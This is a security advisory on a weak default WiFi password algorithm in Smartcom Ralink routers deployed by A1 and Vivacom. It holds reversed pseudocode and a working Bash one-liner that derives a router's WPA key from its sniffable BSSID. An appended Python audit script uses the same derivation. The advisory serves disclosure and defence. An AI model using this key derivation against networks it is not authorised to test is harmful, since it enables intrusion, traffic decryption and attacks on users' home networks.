TITLE
Smartcom Ralink routers use weak default WiFi password generation algorithm

DATE
2 Jan 2025

CWE MAPPING
CWE-1391: Use of Weak Credentials

CVSS
CVSS v4.0 Score: 8.6 / High
CVSS Vector: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:H/SC:H/SI:H/SA:H

VENDOR
Smartcom Bulgaria (https://smartcom.bg)

DEVICES
The following device models are affected by this vulnerability:
* SAM-4G1G-TT-W-VC
* SAM-4F1F-TT-W-A1
* OUI: 50a9de

DESCRIPTION
The rootfs of the device can be read directly from the flash. After careful review, we identified 3 binaries of interest:

    /bin/ralink_init
    /bin/nvram_set
    /bin/nvram_get

All 3 contain an implementation of the function show_wifi_pass(), which after reverse engineering translates to the following pseudocode:

    function show_wifi_pass(serial)
        if (serial == NULL)
            serial = flash_read_serial()
        serial = tolower(serial)
        preimage = serial + "SmartcomWifi"
        preimage_md5 = md5(preimage)
        return preimage_md5[0:8]

The serial number of these routers generally consists of the last 4 bytes of the BSSID, sometimes with an applied offset. The AP BSSID is part of the WiFi beacon frames and can be captured in clear via simple over-the-air sniffing.

POC
The following Bash one-liner implements the default password generation based on the AP's BSSID (the BSSID is expected in lowercase without separators; its last 8 hex characters are used as the serial):

    read -p 'Enter BSSID: ';echo -n 'WPA Key: ';echo -n ${REPLY: -8}SmartcomWifi|md5sum|cut -c -8

IMPACT
A successful attack allows for:
* Unrestricted access to the internal network of the user.
* Access to the local administrative interface of the router through hardcoded credentials.
* Decryption of WiFi traffic.
* Active MITM attacks against clients, outside the AP coverage.

More than 200,000 Smartcom Ralink routers are deployed by the two largest Bulgarian telecom providers, A1 and Vivacom[1]. A1 routers use a custom ESSID in the form "A1_XXXXXX", where XXXXXX are the last 3 octets of the BSSID. Information on these routers can be found on A1's support page[2].
Vivacom routers set a static ESSID with the name "VIVACOM_FiberNet[_5GHz]". This is unfortunate, since using the same ESSID for multiple APs allows for PMK computation reuse and mass PSK attacks. It may also cripple WiFi connectivity in crowded areas, because random clients keep trying to connect to the AP with their own (wrong) PSK.

Based on information collected in wpa-sec.stanev.org, at least 69% of A1 and 54% of Vivacom clients are using the AP default ESSID and password.

WORKAROUND
Never leave the default ESSID and password on the devices you're using. Change them via the device configuration panel or the ISP-provided interface, or call ISP support for help.

TIMELINE
* 2 Jan 2025: Vulnerability reported to Smartcom, A1, Vivacom
* 2 Jan 2025: Vivacom acknowledges the vulnerability
* 6 Jan 2025: Smartcom states the products in question are EoL/EoD; there will be no fix
* 9 Jan 2025: 2nd reminder sent to A1, no response
* 5 Feb 2025: Public disclosure

CREDITS
Radoslav Gerganov, X: @rgerganov, Web: https://xakcop.com
Alex Stanev, X: @RealEnderSec, Web: https://sec.stanev.org

REFERENCES
[1] https://smartcom.bg/customer-success/csp-xcpe
[2] https://help.a1.bg/internet/fixed-internet/wireless-routers/smartcom-ralink
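As a defender's companion to the WORKAROUND above, here is an added self-audit script (not part of the advisory or of the vendor's firmware) that ports the reversed show_wifi_pass() derivation and flags inventory entries whose configured PSK still equals the derived default. It assumes, like the one-liner, that the serial is the un-offset last 4 bytes of the BSSID; the inventory entries and the audit() helper are constructed for the example.

```python
import hashlib
import re

SALT = "SmartcomWifi"  # constant taken from the reversed show_wifi_pass()


def serial_from_bssid(bssid: str) -> str:
    """Serial as described in the advisory: the last 4 bytes of the BSSID as
    8 lowercase hex characters. Separators (':', '-', '.') are stripped so
    either notation works. Assumption: no offset is applied; the advisory
    says some units do apply one, so for those a 'not default' result is
    not conclusive."""
    hex_only = re.sub(r"[^0-9a-fA-F]", "", bssid)
    if len(hex_only) != 12:
        raise ValueError("BSSID must contain exactly 12 hex digits")
    return hex_only[-8:].lower()


def default_wifi_password(serial: str) -> str:
    """Port of show_wifi_pass(): tolower(serial) + SALT, MD5, first 8 hex chars."""
    preimage = serial.lower() + SALT
    return hashlib.md5(preimage.encode("ascii")).hexdigest()[:8]


def psk_is_default(configured_psk: str, bssid: str) -> bool:
    """True when the PSK currently configured on the AP equals the weak default."""
    return configured_psk == default_wifi_password(serial_from_bssid(bssid))


def audit(entries):
    """entries: iterable of (essid, bssid, configured_psk) from your own
    inventory (hypothetical helper). Returns the ESSIDs that still need a
    password change."""
    return [essid for essid, bssid, psk in entries if psk_is_default(psk, bssid)]


if __name__ == "__main__":
    # Constructed sample inventory: the first unit still uses the derived
    # default, the second has a user-chosen PSK.
    bssid = "50:A9:DE:12:34:56"
    inventory = [
        ("A1_123456", bssid, default_wifi_password(serial_from_bssid(bssid))),
        ("VIVACOM_FiberNet", "50:a9:de:ab:cd:ef", "user-chosen-passphrase"),
    ]
    print("needs password change:", audit(inventory))  # -> ['A1_123456']
```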